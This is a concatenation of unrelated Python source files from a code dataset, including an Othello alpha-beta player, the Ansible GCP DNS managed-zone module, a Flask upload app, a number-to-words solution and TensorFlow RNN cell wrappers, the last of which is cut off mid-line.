((board.board[i][j] != self.color) and (board.board[i][j] != board.EMPTY)):\n resultado -= sys.maxint\n return resultado\n\n def contardominio(self, board): #Quantas casas estao sobre meu dominio\n minhascasas = 0.0\n for i in range(1, 9):\n for j in range(1, 9):\n if board.board[i][j] == self.color:\n minhascasas += 1.0\n return minhascasas\n\n def meusmovimentosdisponiveis(self, board):\n return len(board.valid_moves(self.color))\n\n def movimentosdisponiveisinimigo(self, board):\n if (self.color == board.WHITE):\n return len(board.valid_moves(board.BLACK))\n else:\n return len(board.valid_moves(board.WHITE))\n \n\n#############################################################################################\n####################### HEURISTICA RESULTANTE ###############################################\n\n def heuristic(self, board):\n return self.meusmovimentosdisponiveis(board) + self.amadoscantos(board) - self.movimentosdisponiveisinimigo(board) + (\n self.contardominio(board) / 100) \n\n#############################################################################################\n################## ALGORITMO MINMAX COM CORTE ALPHABETA #####################################\n\n def minmaxcortealphabeta(self, board, depth, alpha, beta, tipo):\n global jogada\n global auxiliar\n global njogadas\n \n #Passa a vez\n if (depth == 0) or (self.meusmovimentosdisponiveis(board) == 0):\n njogadas-=1\n return self.heuristic(board)\n\n #Define as cores do inimigo\n enemyColor = board.BLACK\n if (self.color == board.BLACK):\n enemyColor = board.WHITE\n \n \n if (tipo == False): # Se tipo for false roda min\n #Arvore MIN\n moves = board.valid_moves(enemyColor)\n #Inicializa o no como +infinito\n no = sys.maxint\n #Para cada jogada possivel\n for move in moves:\n newboard = copy.deepcopy(board)\n newboard.play(move, enemyColor)\n no = min(\n no,\n self.minmaxcortealphabeta(\n newboard,\n depth - 1,\n alpha,\n beta,\n True))\n beta = min(beta, no)\n #Corte na Arvore\n if (beta <= alpha):\n break\n return no\n #Arvore MAX\n else:\n moves = board.valid_moves(self.color)\n #Inicializa o no como -infinito\n no = -sys.maxint\n for move in moves:\n newboard = copy.deepcopy(board)\n newboard.play(move, self.color)\n no = max(\n no,\n self.minmaxcortealphabeta(\n newboard,\n depth - 1,\n alpha,\n beta,\n False))\n alpha = max(alpha, no)\n if (depth == profundidade) and (no > auxiliar):\n auxiliar = no\n jogada = copy.copy(move)\n #Corte na Arvore\n if (beta <= alpha):\n break\n return no\n\n#############################################################################################\n####################### JOGANDO #############################################################\n\n def play(self, board):\n moves = board.valid_moves(self.color)\n global profundidade\n global auxiliar\n global njogadas \n #Um numero menor de profundidade reduz o tempo de jogada quando ha muitas jogadas possiveis\n profundidade = 2\n #Se ja ocorreram 21 jogadas, entao aumentamos a profundidade da arvore\n if (njogadas>21):\n profundidade = 5\n #Auxiliar para comparacao do no\n auxiliar = -sys.maxint\n #chama o algoritmo minmax\n self.minmaxcortealphabeta(board, profundidade, -sys.maxint, sys.maxint, True)\n global jogada\n #Mais uma jogada foi feita, entao soma 1 na quantidade de jogadas\n #Esse metodo melhora o tempo de execucao em comparacao a outros codigos que buscam as casas livres a cada jogada\n njogadas+=1\n return jogada\n\n#############################################################################################\n#############################################################################################\n","sub_path":"DavideMauricio_OthelloIA/models/players/infinity_player.py","file_name":"infinity_player.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"179123136","text":"import json\ndef send_data(gfile):\n data = json.dumps(gfile)\n f=open(\"file.json\",\"a+\")\n f.write(data)\n f.close()\n\ndef search(name):\n glist = json.load(open('file.json'))\n print(glist(name))\n\nnum = int(input(\"Enter the number of items to store or press '0' => \"))\nitem_list={}\n\nif num!=0:\n for i in range(1,num+1):\n name = input(\"Enter the name of item=> \")\n quantity = input(\"Enter the quantity to store=> \")\n item_list[name] = quantity\n send_data(item_list)\n\nfind = input(\"Enter the item to search=> \")\nsearch(find)\n","sub_path":"code/python/day-3/grocery.py","file_name":"grocery.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542221848","text":"from flask import Flask, request, redirect, render_template\nfrom storage import Storage\n# try:\n# import customconfig as config\n# except:\n# import config\nimport config\n\napp = Flask(__name__)\nstorage = Storage()\n\n@app.route('/acp', methods=['GET'])\ndef acp():\n return render_template('acp/main.html')\n\n@app.route('/acp/upload', methods=['GET', 'POST'])\ndef upload():\n image_urls = []\n if request.method == 'POST':\n if 'images' not in request.files:\n return redirect(request.url)\n images = request.files.getlist('images')\n for image in images:\n result = storage.save(image)\n if result['status'] == 'success':\n image_urls.append(result['url'])\n return render_template('acp/upload.html', image_urls=image_urls)\n\nif __name__ == '__main__':\n app.run(**config.APP_PARAMS)","sub_path":"app_old/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583134078","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2017 Google\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n# ----------------------------------------------------------------------------\n#\n# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***\n#\n# ----------------------------------------------------------------------------\n#\n# This file is automatically generated by Magic Modules and manual\n# changes will be clobbered when the file is regenerated.\n#\n# Please read more about how to change this file at\n# https://www.github.com/GoogleCloudPlatform/magic-modules\n#\n# ----------------------------------------------------------------------------\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\n################################################################################\n# Documentation\n################################################################################\n\nANSIBLE_METADATA = {'metadata_version': '1.1', 'status': [\"preview\"], 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: gcp_dns_managed_zone\ndescription:\n- A zone is a subtree of the DNS namespace under one administrative responsibility.\n A ManagedZone is a resource that represents a DNS zone hosted by the Cloud DNS service.\nshort_description: Creates a GCP ManagedZone\nversion_added: 2.5\nauthor: Google Inc. (@googlecloudplatform)\nrequirements:\n- python >= 2.6\n- requests >= 2.18.4\n- google-auth >= 1.3.0\noptions:\n state:\n description:\n - Whether the given object should exist in GCP\n choices:\n - present\n - absent\n default: present\n type: str\n description:\n description:\n - A mutable string of at most 1024 characters associated with this resource for\n the user's convenience. Has no effect on the managed zone's function.\n required: true\n type: str\n dns_name:\n description:\n - The DNS name of this managed zone, for instance \"example.com.\".\n required: true\n type: str\n dnssec_config:\n description:\n - DNSSEC configuration.\n required: false\n type: dict\n version_added: 2.9\n suboptions:\n kind:\n description:\n - Identifies what kind of resource this is.\n required: false\n default: dns#managedZoneDnsSecConfig\n type: str\n non_existence:\n description:\n - Specifies the mechanism used to provide authenticated denial-of-existence\n responses.\n - 'Some valid choices include: \"nsec\", \"nsec3\"'\n required: false\n type: str\n state:\n description:\n - Specifies whether DNSSEC is enabled, and what mode it is in.\n - 'Some valid choices include: \"off\", \"on\", \"transfer\"'\n required: false\n type: str\n default_key_specs:\n description:\n - Specifies parameters that will be used for generating initial DnsKeys for\n this ManagedZone. If you provide a spec for keySigning or zoneSigning, you\n must also provide one for the other.\n required: false\n type: list\n suboptions:\n algorithm:\n description:\n - String mnemonic specifying the DNSSEC algorithm of this key.\n - 'Some valid choices include: \"ecdsap256sha256\", \"ecdsap384sha384\", \"rsasha1\",\n \"rsasha256\", \"rsasha512\"'\n required: false\n type: str\n key_length:\n description:\n - Length of the keys in bits.\n required: false\n type: int\n key_type:\n description:\n - Specifies whether this is a key signing key (KSK) or a zone signing\n key (ZSK). Key signing keys have the Secure Entry Point flag set and,\n when active, will only be used to sign resource record sets of type\n DNSKEY. Zone signing keys do not have the Secure Entry Point flag set\n and will be used to sign all other types of resource record sets. .\n - 'Some valid choices include: \"keySigning\", \"zoneSigning\"'\n required: false\n type: str\n kind:\n description:\n - Identifies what kind of resource this is.\n required: false\n default: dns#dnsKeySpec\n type: str\n name:\n description:\n - User assigned name for this resource.\n - Must be unique within the project.\n required: true\n type: str\n name_server_set:\n description:\n - Optionally specifies the NameServerSet for this ManagedZone. A NameServerSet\n is a set of DNS name servers that all host the same ManagedZones. Most users\n will leave this field unset.\n required: false\n type: str\n labels:\n description:\n - A set of key/value label pairs to assign to this ManagedZone.\n required: false\n type: dict\n version_added: 2.8\n visibility:\n description:\n - 'The zone''s visibility: public zones are exposed to the Internet, while private\n zones are visible only to Virtual Private Cloud resources.'\n - 'Must be one of: `public`, `private`.'\n - 'Some valid choices include: \"private\", \"public\"'\n required: false\n default: public\n type: str\n version_added: 2.8\n private_visibility_config:\n description:\n - For privately visible zones, the set of Virtual Private Cloud resources that\n the zone is visible from.\n required: false\n type: dict\n version_added: 2.8\n suboptions:\n networks:\n description:\n - The list of VPC networks that can see this zone.\n required: false\n type: list\n suboptions:\n network_url:\n description:\n - The fully qualified URL of the VPC network to bind to.\n - This should be formatted like `U(https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`)\n .\n required: false\n type: str\nextends_documentation_fragment: gcp\nnotes:\n- 'API Reference: U(https://cloud.google.com/dns/api/v1/managedZones)'\n- 'Managing Zones: U(https://cloud.google.com/dns/zones/)'\n'''\n\nEXAMPLES = '''\n- name: create a managed zone\n gcp_dns_managed_zone:\n name: test_object\n dns_name: test.somewild2.example.com.\n description: test zone\n project: test_project\n auth_kind: serviceaccount\n service_account_file: \"/tmp/auth.pem\"\n state: present\n'''\n\nRETURN = '''\ndescription:\n description:\n - A mutable string of at most 1024 characters associated with this resource for\n the user's convenience. Has no effect on the managed zone's function.\n returned: success\n type: str\ndnsName:\n description:\n - The DNS name of this managed zone, for instance \"example.com.\".\n returned: success\n type: str\ndnssecConfig:\n description:\n - DNSSEC configuration.\n returned: success\n type: complex\n contains:\n kind:\n description:\n - Identifies what kind of resource this is.\n returned: success\n type: str\n nonExistence:\n description:\n - Specifies the mechanism used to provide authenticated denial-of-existence\n responses.\n returned: success\n type: str\n state:\n description:\n - Specifies whether DNSSEC is enabled, and what mode it is in.\n returned: success\n type: str\n defaultKeySpecs:\n description:\n - Specifies parameters that will be used for generating initial DnsKeys for\n this ManagedZone. If you provide a spec for keySigning or zoneSigning, you\n must also provide one for the other.\n returned: success\n type: complex\n contains:\n algorithm:\n description:\n - String mnemonic specifying the DNSSEC algorithm of this key.\n returned: success\n type: str\n keyLength:\n description:\n - Length of the keys in bits.\n returned: success\n type: int\n keyType:\n description:\n - Specifies whether this is a key signing key (KSK) or a zone signing key\n (ZSK). Key signing keys have the Secure Entry Point flag set and, when\n active, will only be used to sign resource record sets of type DNSKEY.\n Zone signing keys do not have the Secure Entry Point flag set and will\n be used to sign all other types of resource record sets. .\n returned: success\n type: str\n kind:\n description:\n - Identifies what kind of resource this is.\n returned: success\n type: str\nid:\n description:\n - Unique identifier for the resource; defined by the server.\n returned: success\n type: int\nname:\n description:\n - User assigned name for this resource.\n - Must be unique within the project.\n returned: success\n type: str\nnameServers:\n description:\n - Delegate your managed_zone to these virtual name servers; defined by the server\n .\n returned: success\n type: list\nnameServerSet:\n description:\n - Optionally specifies the NameServerSet for this ManagedZone. A NameServerSet is\n a set of DNS name servers that all host the same ManagedZones. Most users will\n leave this field unset.\n returned: success\n type: str\ncreationTime:\n description:\n - The time that this resource was created on the server.\n - This is in RFC3339 text format.\n returned: success\n type: str\nlabels:\n description:\n - A set of key/value label pairs to assign to this ManagedZone.\n returned: success\n type: dict\nvisibility:\n description:\n - 'The zone''s visibility: public zones are exposed to the Internet, while private\n zones are visible only to Virtual Private Cloud resources.'\n - 'Must be one of: `public`, `private`.'\n returned: success\n type: str\nprivateVisibilityConfig:\n description:\n - For privately visible zones, the set of Virtual Private Cloud resources that the\n zone is visible from.\n returned: success\n type: complex\n contains:\n networks:\n description:\n - The list of VPC networks that can see this zone.\n returned: success\n type: complex\n contains:\n networkUrl:\n description:\n - The fully qualified URL of the VPC network to bind to.\n - This should be formatted like `U(https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`)\n .\n returned: success\n type: str\n'''\n\n################################################################################\n# Imports\n################################################################################\n\nfrom ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict\nimport json\n\n################################################################################\n# Main\n################################################################################\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n module = GcpModule(\n argument_spec=dict(\n state=dict(default='present', choices=['present', 'absent'], type='str'),\n description=dict(required=True, type='str'),\n dns_name=dict(required=True, type='str'),\n dnssec_config=dict(\n type='dict',\n options=dict(\n kind=dict(default='dns#managedZoneDnsSecConfig', type='str'),\n non_existence=dict(type='str'),\n state=dict(type='str'),\n default_key_specs=dict(\n type='list',\n elements='dict',\n options=dict(\n algorithm=dict(type='str'), key_length=dict(type='int'), key_type=dict(type='str'), kind=dict(default='dns#dnsKeySpec', type='str')\n ),\n ),\n ),\n ),\n name=dict(required=True, type='str'),\n name_server_set=dict(type='str'),\n labels=dict(type='dict'),\n visibility=dict(default='public', type='str'),\n private_visibility_config=dict(type='dict', options=dict(networks=dict(type='list', elements='dict', options=dict(network_url=dict(type='str'))))),\n )\n )\n\n if not module.params['scopes']:\n module.params['scopes'] = ['https://www.googleapis.com/auth/ndev.clouddns.readwrite']\n\n state = module.params['state']\n kind = 'dns#managedZone'\n\n fetch = fetch_resource(module, self_link(module), kind)\n changed = False\n\n if fetch:\n if state == 'present':\n if is_different(module, fetch):\n update(module, self_link(module), kind, fetch)\n fetch = fetch_resource(module, self_link(module), kind)\n changed = True\n else:\n delete(module, self_link(module), kind)\n fetch = {}\n changed = True\n else:\n if state == 'present':\n fetch = create(module, collection(module), kind)\n changed = True\n else:\n fetch = {}\n\n fetch.update({'changed': changed})\n\n module.exit_json(**fetch)\n\n\ndef create(module, link, kind):\n auth = GcpSession(module, 'dns')\n return return_if_object(module, auth.post(link, resource_to_request(module)), kind)\n\n\ndef update(module, link, kind, fetch):\n update_fields(module, resource_to_request(module), response_to_hash(module, fetch))\n return fetch_resource(module, self_link(module), kind)\n\n\ndef update_fields(module, request, response):\n if (\n response.get('description') != request.get('description')\n or response.get('labels') != request.get('labels')\n or response.get('privateVisibilityConfig') != request.get('privateVisibilityConfig')\n ):\n description_update(module, request, response)\n\n\ndef description_update(module, request, response):\n auth = GcpSession(module, 'dns')\n auth.patch(\n ''.join([\"https://www.googleapis.com/dns/v1/\", \"projects/{project}/managedZones/{name}\"]).format(**module.params),\n {\n u'description': module.params.get('description'),\n u'labels': module.params.get('labels'),\n u'privateVisibilityConfig': ManagedZonePrivatevisibilityconfig(module.params.get('private_visibility_config', {}), module).to_request(),\n },\n )\n\n\ndef delete(module, link, kind):\n auth = GcpSession(module, 'dns')\n return return_if_object(module, auth.delete(link), kind)\n\n\ndef resource_to_request(module):\n request = {\n u'kind': 'dns#managedZone',\n u'description': module.params.get('description'),\n u'dnsName': module.params.get('dns_name'),\n u'dnssecConfig': ManagedZoneDnssecconfig(module.params.get('dnssec_config', {}), module).to_request(),\n u'name': module.params.get('name'),\n u'nameServerSet': module.params.get('name_server_set'),\n u'labels': module.params.get('labels'),\n u'visibility': module.params.get('visibility'),\n u'privateVisibilityConfig': ManagedZonePrivatevisibilityconfig(module.params.get('private_visibility_config', {}), module).to_request(),\n }\n return_vals = {}\n for k, v in request.items():\n if v or v is False:\n return_vals[k] = v\n\n return return_vals\n\n\ndef fetch_resource(module, link, kind, allow_not_found=True):\n auth = GcpSession(module, 'dns')\n return return_if_object(module, auth.get(link), kind, allow_not_found)\n\n\ndef self_link(module):\n return \"https://www.googleapis.com/dns/v1/projects/{project}/managedZones/{name}\".format(**module.params)\n\n\ndef collection(module):\n return \"https://www.googleapis.com/dns/v1/projects/{project}/managedZones\".format(**module.params)\n\n\ndef return_if_object(module, response, kind, allow_not_found=False):\n # If not found, return nothing.\n if allow_not_found and response.status_code == 404:\n return None\n\n # If no content, return nothing.\n if response.status_code == 204:\n return None\n\n try:\n module.raise_for_status(response)\n result = response.json()\n except getattr(json.decoder, 'JSONDecodeError', ValueError):\n module.fail_json(msg=\"Invalid JSON response with error: %s\" % response.text)\n\n if navigate_hash(result, ['error', 'errors']):\n module.fail_json(msg=navigate_hash(result, ['error', 'errors']))\n\n return result\n\n\ndef is_different(module, response):\n request = resource_to_request(module)\n response = response_to_hash(module, response)\n\n # Remove all output-only from response.\n response_vals = {}\n for k, v in response.items():\n if k in request:\n response_vals[k] = v\n\n request_vals = {}\n for k, v in request.items():\n if k in response:\n request_vals[k] = v\n\n return GcpRequest(request_vals) != GcpRequest(response_vals)\n\n\n# Remove unnecessary properties from the response.\n# This is for doing comparisons with Ansible's current parameters.\ndef response_to_hash(module, response):\n return {\n u'description': response.get(u'description'),\n u'dnsName': response.get(u'dnsName'),\n u'dnssecConfig': ManagedZoneDnssecconfig(response.get(u'dnssecConfig', {}), module).from_response(),\n u'id': response.get(u'id'),\n u'name': response.get(u'name'),\n u'nameServers': response.get(u'nameServers'),\n u'nameServerSet': response.get(u'nameServerSet'),\n u'creationTime': response.get(u'creationTime'),\n u'labels': response.get(u'labels'),\n u'visibility': response.get(u'visibility'),\n u'privateVisibilityConfig': ManagedZonePrivatevisibilityconfig(response.get(u'privateVisibilityConfig', {}), module).from_response(),\n }\n\n\nclass ManagedZoneDnssecconfig(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = {}\n\n def to_request(self):\n return remove_nones_from_dict(\n {\n u'kind': self.request.get('kind'),\n u'nonExistence': self.request.get('non_existence'),\n u'state': self.request.get('state'),\n u'defaultKeySpecs': ManagedZoneDefaultkeyspecsArray(self.request.get('default_key_specs', []), self.module).to_request(),\n }\n )\n\n def from_response(self):\n return remove_nones_from_dict(\n {\n u'kind': self.request.get(u'kind'),\n u'nonExistence': self.request.get(u'nonExistence'),\n u'state': self.request.get(u'state'),\n u'defaultKeySpecs': ManagedZoneDefaultkeyspecsArray(self.request.get(u'defaultKeySpecs', []), self.module).from_response(),\n }\n )\n\n\nclass ManagedZoneDefaultkeyspecsArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict(\n {u'algorithm': item.get('algorithm'), u'keyLength': item.get('key_length'), u'keyType': item.get('key_type'), u'kind': item.get('kind')}\n )\n\n def _response_from_item(self, item):\n return remove_nones_from_dict(\n {u'algorithm': item.get(u'algorithm'), u'keyLength': item.get(u'keyLength'), u'keyType': item.get(u'keyType'), u'kind': item.get(u'kind')}\n )\n\n\nclass ManagedZonePrivatevisibilityconfig(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = {}\n\n def to_request(self):\n return remove_nones_from_dict({u'networks': ManagedZoneNetworksArray(self.request.get('networks', []), self.module).to_request()})\n\n def from_response(self):\n return remove_nones_from_dict({u'networks': ManagedZoneNetworksArray(self.request.get(u'networks', []), self.module).from_response()})\n\n\nclass ManagedZoneNetworksArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({u'networkUrl': item.get('network_url')})\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({u'networkUrl': item.get(u'networkUrl')})\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/cloud/google/gcp_dns_managed_zone.py","file_name":"gcp_dns_managed_zone.py","file_ext":"py","file_size_in_byte":21120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174599227","text":"class Solution:\n def numberToWords(self, num: int) -> str:\n #We only consider zero in this case, otherwise everywhere else we will ignore 0\n if num==0:\n return \"Zero\"\n suffix=[\"\",\"Thousand\",\"Million\",\"Billion\"]\n \n onetotwenty={1:\"One\",2:\"Two\",3:\"Three\",4:\"Four\",5:\"Five\",6:\"Six\",7:\"Seven\",8:\"Eight\",9:\"Nine\",10:\"Ten\",11:\"Eleven\",12:\"Twelve\",13:\"Thirteen\",14:\"Fourteen\",15:\"Fifteen\",16:\"Sixteen\",17:\"Seventeen\",18:\"Eighteen\",19:\"Nineteen\"}\n tens={20:\"Twenty\",30:\"Thirty\",40:\"Forty\",50:\"Fifty\",60:\"Sixty\",70:\"Seventy\",80:\"Eighty\",90:\"Ninety\"}\n result=\"\"\n idx=0\n #Helper to calculate num in pairs of 3 and we will then combine the suffix\n def helper(nump):\n if nump==0:\n return \"\"\n if nump<20:\n return onetotwenty[nump]+\" \"\n elif nump<100:#less than 100 we get the tens +onetotwenty\n v=(nump//10)*10\n return tens[v]+\" \"+helper(nump%10)\n else:\n v=(nump//100)\n return onetotwenty[v]+\" Hundred \"+helper(nump%100)\n \n \n while(num>0):\n #Divide by thousand to get 3 digits\n \n if (num%1000>0):\n #we will combine the result at last as we are processing from right to left\n result=helper(num%1000)+suffix[idx]+\" \"+result\n #divide the number by 1000 to remove last 3 digits\n num=num//1000\n idx+=1\n return result.strip()\n #Time O(n), n=number of digits in num but it is constant\n #Space O(1)\n \n \n","sub_path":"problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646592798","text":"from itertools import product, permutations, combinations\n\nclass MaxUtil():\n def __init__(self, util_rav, end_rav, prices_rav, G, budget, ngoods, nnodes):\n self.util_rav = util_rav\n self.end_rav = end_rav\n self.prices_rav = prices_rav\n self.G = G\n self.budget = budget\n self.ngoods = ngoods\n self.nnodes = nnodes\n\n def get_max_util(self):\n max_util = {}\n\n def l(i,j,k):\n countj = j\n countk = k*self.nnodes\n counti = div * i\n return counti + countk + countj\n\n div = self.nnodes * self.ngoods\n for n in self.G:\n temp = []\n combs = []\n mx = 0\n mxu = 0\n for j in self.G:\n for k in range(self.ngoods):\n if self.util_rav[l(n,j,k)] == 1:\n temp.append(l(n,j,k))\n for ii in range(len(temp)):\n combs.append(list(combinations(temp, ii+1)))\n combs = [item for sublist in combs for item in sublist]\n maxu = 0\n for item in combs:\n s = 0\n for ii in item:\n s += self.end_rav[ii]*self.prices_rav[ii]\n if s <= self.budget[n] and s > maxu:\n maxu = sum([self.util_rav[ii]*self.end_rav[ii] for ii in item])\n max_util[n] = maxu\n\n return max_util\n","sub_path":"code/max_util.py","file_name":"max_util.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287157171","text":"class Request:\n def __init__(self, req_id: int, emp_id: int, req_amount: float, req_desc: str,\n req_date: str, approved: bool, mgr_message: str, reviewed: bool):\n self.req_id = req_id\n self.emp_id = emp_id\n self.req_amount = req_amount\n self.req_desc = req_desc\n self.req_date = req_date\n self.approved = approved\n self.mgr_message = mgr_message\n self.reviewed = reviewed\n\n def json(self):\n return {'reqID': self.req_id,\n 'empID': self.emp_id,\n 'reqAmount': self.req_amount,\n 'reqDesc': self.req_desc,\n 'reqDate': self.req_date,\n 'approved': self.approved,\n 'mgrMessage': self.mgr_message,\n 'reviewed': self.reviewed\n }\n\n @staticmethod\n def json_deserialize(json):\n request = Request(0, 0, 0, '', '', False, '', False)\n request.req_id = json['reqID']\n request.emp_id = json['empID']\n request.req_amount = json['reqAmount']\n request.req_desc = json['reqDesc']\n request.req_date = json['reqDate']\n request.approved = json['approved']\n request.mgr_message = json['mgrMessage']\n request.reviewed = json['reviewed']\n return request\n","sub_path":"Project1Backend/entities/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411149573","text":"#!/usr/bin/env python3\n\"\"\"\nCreate a vtu file representing a gaussian distribution in 3D.\n\nAccept a json dictionary with two keys, mean and covariance.\n\n\"\"\"\n\nimport argparse\nimport json\nimport numpy as np\nimport pyevtk\nimport sys\n\nfrom lieroy.parallel import se3_log\nfrom recova.util import parse_dims\n\n\ndef make_ellipsoid_mesh(a,b,c, resolution_u = 10, resolution_v = 10):\n u = np.linspace(0, 2*np.pi, resolution_u, endpoint=True)\n v = np.linspace(0, np.pi, resolution_v, endpoint=True)\n\n U,V = np.meshgrid(u,v, indexing='ij')\n\n X = a * np.cos(U) * np.sin(V)\n Y = b * np.sin(U) * np.sin(V)\n Z = c * np.cos(V)\n\n # Flatten the list of points.\n points = []\n for i in range(resolution_u):\n for j in range(resolution_v):\n point = [X[i,j], Y[i,j], Z[i,j]]\n points.append(point)\n\n # Create the connectivity.\n # Every point is connected to its neighbours on the meshgrid.\n connectivity = []\n offsets = []\n for i in range(resolution_u - 1):\n for j in range(resolution_v - 1):\n point_id = i*resolution_v + j\n\n element_to_add = [point_id, point_id + resolution_v, point_id + resolution_v + 1, point_id + 1]\n connectivity.extend(element_to_add)\n\n if not offsets:\n offsets = [len(element_to_add)]\n else:\n offsets.append(offsets[-1] + len(element_to_add))\n\n return np.array(points), np.array(connectivity), np.array(offsets)\n\n\ndef save_evtk_unstructured_grid(filename, points, connectivity, offsets):\n cell_types = np.array([pyevtk.vtk.VtkQuad.tid] * len(offsets))\n pyevtk.hl.unstructuredGridToVTK(filename,\n np.ascontiguousarray(points[:,0]),\n np.ascontiguousarray(points[:,1]),\n np.ascontiguousarray(points[:,2]),\n np.ascontiguousarray(connectivity),\n np.ascontiguousarray(offsets),\n np.ascontiguousarray(cell_types))\n\n\ndef apply_t_to_points(points, T):\n homogeneous_points = np.ones((4,len(points)))\n homogeneous_points[0:3,:] = points.T\n\n transformed_points = np.dot(T, homogeneous_points)\n\n return transformed_points[0:3, :].T\n\n\ndef distribution_to_vtk_ellipsoid(mean, covariance, filename):\n eig_vals, eig_vecs = np.linalg.eig(covariance)\n\n T = np.identity(4)\n T[0:3,0:3] = eig_vecs\n T[0:3,3] = mean\n\n # Replace negative eigenvalues by a very small number.\n for i in range(len(eig_vals)):\n if eig_vals[i] < 0.0:\n eig_vals[i] = 1e-6\n\n points, connectivity, offsets = make_ellipsoid_mesh(*np.sqrt(eig_vals))\n\n points_transformed = apply_t_to_points(points, T)\n\n save_evtk_unstructured_grid(filename, points_transformed, connectivity, offsets)\n\ndef cli():\n parser = argparse.ArgumentParser()\n parser.add_argument('output', type=str, help='The name of the file where to export the plot')\n parser.add_argument('--dims', type=str, default='0,1,2', help='Comma separated list of the dimensions to extract from the covariance matrix')\n parser.add_argument('--center-around-gt', action='store_true')\n args = parser.parse_args()\n\n input_dict = json.load(sys.stdin)\n\n if args.center_around_gt:\n mean = np.identity(4)\n else:\n mean = np.array(input_dict['mean'])\n\n covariance = np.array(input_dict['covariance'])\n\n mean_lie = se3_log(mean)\n\n dims = parse_dims(args.dims)\n\n # Extract the appropriate dims from the covariance matrix.\n covariance = covariance[dims][:,dims]\n\n distribution_to_vtk_ellipsoid(mean_lie[dims], covariance, args.output)\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"recova/distribution_to_vtk_ellipsoid.py","file_name":"distribution_to_vtk_ellipsoid.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204767806","text":"#from tensorflow.contrib.rnn.python.ops import core_rnn_cell as rnn_cell\nimport numpy as np\nimport tensorflow as tf\n#from tensorflow.contrib.rnn.python.ops.core_rnn_cell_impl import * # tf == 1.1\nfrom tensorflow.python.ops.rnn_cell_impl import * # tf >= 1.2\nimport core.models.wikiP2D.coref.util as coref_util\n\n\n\nclass SharingWrapper(RNNCell):\n def __init__(self, cell):\n self._cell = cell\n self.my_scope = None\n\n @property\n def state_size(self):\n return self._cell.state_size\n\n @property\n def output_size(self):\n return self._cell.output_size\n\n def __call__(self, inputs, state, _scope=None):\n # _scope is not used (Hold the scope where it was called first.)\n if self.my_scope == None:\n self.my_scope = tf.get_variable_scope() \n else:\n self.my_scope.reuse_variables()\n return self._cell(inputs, state, self.my_scope)\n\n# (from e2e-coref)\nclass CustomLSTMCell(tf.contrib.rnn.RNNCell):\n def __init__(self, num_units, dropout, reuse=None, scope=None):\n self._num_units = num_units\n self._dropout = dropout\n self._reuse = reuse\n\n with tf.variable_scope(scope or type(self).__name__, reuse=reuse):\n self._initializer = self._block_orthonormal_initializer([self.output_size] * 3)\n self.initial_cell_state = tf.get_variable(\"lstm_initial_cell_state\", [1, self.output_size])\n self.initial_hidden_state = tf.get_variable(\"lstm_initial_hidden_state\", [1, self.output_size])\n #self._initial_state = tf.contrib.rnn.LSTMStateTuple(initial_cell_state, initial_hidden_state)\n\n @property\n def state_size(self):\n return tf.contrib.rnn.LSTMStateTuple(self.output_size, self.output_size)\n\n @property\n def output_size(self):\n return self._num_units\n\n #@property\n def initial_state(self, batch_size):\n initial_cell_state = tf.tile(self.initial_cell_state, [batch_size, 1])\n initial_hidden_state = tf.tile(self.initial_hidden_state, [batch_size, 1])\n return tf.contrib.rnn.LSTMStateTuple(initial_cell_state, initial_hidden_state)\n #return self._initial_state\n\n #def preprocess_input(self, inputs):\n # return coref_util.projection(inputs, 3 * self.output_size)\n\n def __call__(self, inputs, state, scope=None):\n \"\"\"Long short-term memory cell (LSTM).\"\"\"\n with tf.variable_scope(scope or type(self).__name__, reuse=self._reuse): # \"CustomLSTMCell\"\n with tf.variable_scope('preprocess'):\n inputs = coref_util.projection(inputs, 3 * self.output_size)\n c, h = state\n #h *= self._dropout_mask\n h = tf.nn.dropout(h, self._dropout)\n with tf.variable_scope('projection'):\n projected_h = coref_util.projection(h, 3 